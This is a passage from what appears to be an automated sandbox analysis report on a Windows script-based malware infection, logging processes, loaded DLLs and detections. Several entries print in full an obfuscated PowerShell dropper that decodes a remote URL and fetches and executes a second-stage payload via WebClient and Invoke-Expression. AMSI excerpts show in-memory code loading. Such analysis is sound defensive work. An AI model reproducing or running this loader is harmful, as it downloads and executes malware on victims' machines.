imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.Core.pdbk source: powershell.exe, 00000007.00000002.2864093210.0000000008588000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrou", "0")
              Source: Yara matchFile source: 00000007.00000002.2865783140.00000000095EB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2865648783.0000000008A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2850277699.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Miljbeskyttelsessektor)$glObal:YnkSoMst = [sYsTem.Text.enCodinG]::AscII.getsTrinG($viRidIgENous)$Global:THanaToLOg=$YNKsOMST.suBsTrING($rAATRet,$afFt)<#Bijouterie Oplftet Aarsindkoms
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Startparameters $Sabbies $ruellia), (Fimbria @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Mieke = [AppDomain]::CurrentDomain.GetAssemblies()$global:Sobr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nonpedestrian)), $Overfrelserne).DefineDynamicModule($Jonny, $false).DefineType($Guiled, $Purulence, [System.MulticastDelegate])$brkst
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Miljbeskyttelsessektor)$glObal:YnkSoMst = [sYsTem.Text.enCodinG]::AscII.getsTrinG($viRidIgENous)$Global:THanaToLOg=$YNKsOMST.suBsTrING($rAATRet,$afFt)<#Bijouterie Oplftet Aarsindkoms
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
